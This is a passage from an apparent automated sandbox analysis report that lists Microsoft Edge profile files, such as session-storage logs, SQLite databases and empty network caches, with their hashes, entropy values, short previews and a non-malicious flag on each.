                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................u .b................next-map-id.1.Cnamespace-02094193_3c93_40aa_8be3_e1ba1df541ad-https://ntp.msn.com/.0h.__.................map-0-shd_sweeper.%{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.p.r.g.-.m.s.n.-.g.l.s.b.i.d.m.,.1.s.-.p.n.p.f.e.d.l.o.c.,.p.n.p.w.x.e.x.p.i.r.e.1.8.0.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.-.g.e.n.u.2.i.v.3.t.3.,.p.r.g.-.1.s.w.-.s.a.-.s.p.7.-.t.c.c.,.1.s.-.w.p.o.-.p.r.1.-.c.t.t.u.-.c.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.p.2.-.i.g.n.o.r.e.c.m.,.b.t.i.e.-.a.d.-.d.p.r.-.m.i.n.1.5.,.p.r.g.-.a.d.-.d.p.r.,.1.s.-.f.c.r.y.p.t.,.r.o.u.t.e.w.i.n.d.r.i.n.g.0.c.,.p.r.g.-.1.s.w.-.s.a.c.c.u.n.i.f.y.v.2.c.,.1.s.-.n.t.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.177851958086177
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4b+q2PCHhJ23oH+TcwtrQMxIFUtJv4oZmwPv4lVkwOCHhJ23oH+TcwtrQMFd:7sCvBYebCFUtqo/YL56YebtJ
                                                                                                                                                                                                                                                                          MD5:5763FD491F14B3E215BE426B27767837
                                                                                                                                                                                                                                                                          SHA1:96878503FC97FA5F0E1AC119D323608FE49998F2
                                                                                                                                                                                                                                                                          SHA-256:BDD07C33A8166244A468E5A0CC0F12A41376CDC364AFAD8633287E0F0C815FEC
                                                                                                                                                                                                                                                                          SHA-512:C8AE6F6FBA94B638D8747F77EF1FC4D785F7BEA9912D8E7CFF81D3551E70838905FDF63B96C1933D3B2A9B430EAF75801831269666DF1714D8EDC32521941F22
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.334 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:55:36.335 1a08 Recovering log #3.2025/01/09-08:55:36.394 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.177851958086177
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4b+q2PCHhJ23oH+TcwtrQMxIFUtJv4oZmwPv4lVkwOCHhJ23oH+TcwtrQMFd:7sCvBYebCFUtqo/YL56YebtJ
                                                                                                                                                                                                                                                                          MD5:5763FD491F14B3E215BE426B27767837
                                                                                                                                                                                                                                                                          SHA1:96878503FC97FA5F0E1AC119D323608FE49998F2
                                                                                                                                                                                                                                                                          SHA-256:BDD07C33A8166244A468E5A0CC0F12A41376CDC364AFAD8633287E0F0C815FEC
                                                                                                                                                                                                                                                                          SHA-512:C8AE6F6FBA94B638D8747F77EF1FC4D785F7BEA9912D8E7CFF81D3551E70838905FDF63B96C1933D3B2A9B430EAF75801831269666DF1714D8EDC32521941F22
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.334 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:55:36.335 1a08 Recovering log #3.2025/01/09-08:55:36.394 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380904538120506

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                          Entropy (8bit):3.811076042649066
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:3HjJOsaDpsAF4unxitLp3X2amEtG1ChqJ69KiuQKkOAM4zH:3HdpuzFELp2FEkChx9vHOpmH
                                                                                                                                                                                                                                                                          MD5:7FB902BD1BFC3C96DD13A1E9C2B94319
                                                                                                                                                                                                                                                                          SHA1:C42637F53E0E918A49834047EA70AFCB66805E2A
                                                                                                                                                                                                                                                                          SHA-256:7D5170649E6432D007237591C2C93A1158DB1A13F4111153792418A5928AA007
                                                                                                                                                                                                                                                                          SHA-512:5E5EE59C503824B9BF0C9E94B5F247D51C93CF9B70B8D3B91710C304E8884762DCAF3F063AFC2582A9AAA8801C781FF929DC1EEE1116EC7CC4E0B3A671311FCD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SNSS.......?..r...........?..r......"?..r...........?..r.......?..r.......@..r.......@..r....!..@..r...............................?..r@..r1..,...@..r$...02094193_3c93_40aa_8be3_e1ba1df541ad...?..r.......@..r....\..........?..r...?..r.......................?..r....................5..0...?..r&...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}.....?..r.......?..r.......................@..r...........@..r........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......;K6UF+..<K6UF+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8...............................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):349
                                                                                                                                                                                                                                                                          Entropy (8bit):5.098373109572272
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvbq2PCHhJ23oH+Tcwt7Uh2ghZIFUtJvBLJZmwPvBLDkwOCHhJ23oH+Tcwt7UT:7XvBYebIhHh2FUtx/J56YebIhHLJ
                                                                                                                                                                                                                                                                          MD5:3A5AB3E6EF562CFBCCBC0751E647A668
                                                                                                                                                                                                                                                                          SHA1:BD29CA560119C36B25EED32F1FEFD2A18053E695
                                                                                                                                                                                                                                                                          SHA-256:59B30F521440A77AF14F6686BA04A87211B8B7E6A6DE00B311FF752163283BA4
                                                                                                                                                                                                                                                                          SHA-512:D729BC6E24531953469EC3166FCEE4D6F2468E6EE9BA024D3D9B73F3EF18896F3CE9222DBAC6B08863DA02387F16438DB720584471A6BA15B6FAF81F1C35A809
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.652 5e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:55:35.653 5e0 Recovering log #3.2025/01/09-08:55:35.653 5e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):349
                                                                                                                                                                                                                                                                          Entropy (8bit):5.098373109572272
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvbq2PCHhJ23oH+Tcwt7Uh2ghZIFUtJvBLJZmwPvBLDkwOCHhJ23oH+Tcwt7UT:7XvBYebIhHh2FUtx/J56YebIhHLJ
                                                                                                                                                                                                                                                                          MD5:3A5AB3E6EF562CFBCCBC0751E647A668
                                                                                                                                                                                                                                                                          SHA1:BD29CA560119C36B25EED32F1FEFD2A18053E695
                                                                                                                                                                                                                                                                          SHA-256:59B30F521440A77AF14F6686BA04A87211B8B7E6A6DE00B311FF752163283BA4
                                                                                                                                                                                                                                                                          SHA-512:D729BC6E24531953469EC3166FCEE4D6F2468E6EE9BA024D3D9B73F3EF18896F3CE9222DBAC6B08863DA02387F16438DB720584471A6BA15B6FAF81F1C35A809
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.652 5e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:55:35.653 5e0 Recovering log #3.2025/01/09-08:55:35.653 5e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):434
                                                                                                                                                                                                                                                                          Entropy (8bit):5.266510442109748
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:7sz+vBYebvqBQFUtqvm/YeV56YebvqBvJ:7FBYebvZgoY6Yebvk
                                                                                                                                                                                                                                                                          MD5:481BA8207D4CD7F56B2A4BA4F35FC323
                                                                                                                                                                                                                                                                          SHA1:E1DF178F5486F9F96DF184314D71A9C8ED651D5D
                                                                                                                                                                                                                                                                          SHA-256:0CDE3E5F1D64EB99897838DA811FE4662D935575950738423CBB51400A3479E1
                                                                                                                                                                                                                                                                          SHA-512:C1ADCFDB86D073C0E17E5F7851337B2C2F195B8E95FA762750AB57D211240D858A0F664B3359CC779274D218DD27EE30CA9A22E462A511C00A50B47658356E87
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.411 164c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:55:36.412 164c Recovering log #3.2025/01/09-08:55:36.416 164c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):434
                                                                                                                                                                                                                                                                          Entropy (8bit):5.266510442109748
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:7sz+vBYebvqBQFUtqvm/YeV56YebvqBvJ:7FBYebvZgoY6Yebvk
                                                                                                                                                                                                                                                                          MD5:481BA8207D4CD7F56B2A4BA4F35FC323
                                                                                                                                                                                                                                                                          SHA1:E1DF178F5486F9F96DF184314D71A9C8ED651D5D
                                                                                                                                                                                                                                                                          SHA-256:0CDE3E5F1D64EB99897838DA811FE4662D935575950738423CBB51400A3479E1
                                                                                                                                                                                                                                                                          SHA-512:C1ADCFDB86D073C0E17E5F7851337B2C2F195B8E95FA762750AB57D211240D858A0F664B3359CC779274D218DD27EE30CA9A22E462A511C00A50B47658356E87
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.411 164c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:55:36.412 164c Recovering log #3.2025/01/09-08:55:36.416 164c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\16bfa780-b119-4268-bee1-7cf7ad261a42.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\4318f81d-d724-4215-b5d5-bea1fd34af2f.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\70ba0a46-d3fc-4bbd-99e2-9d1e7d0a83b4.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3a7f9.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3b046.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
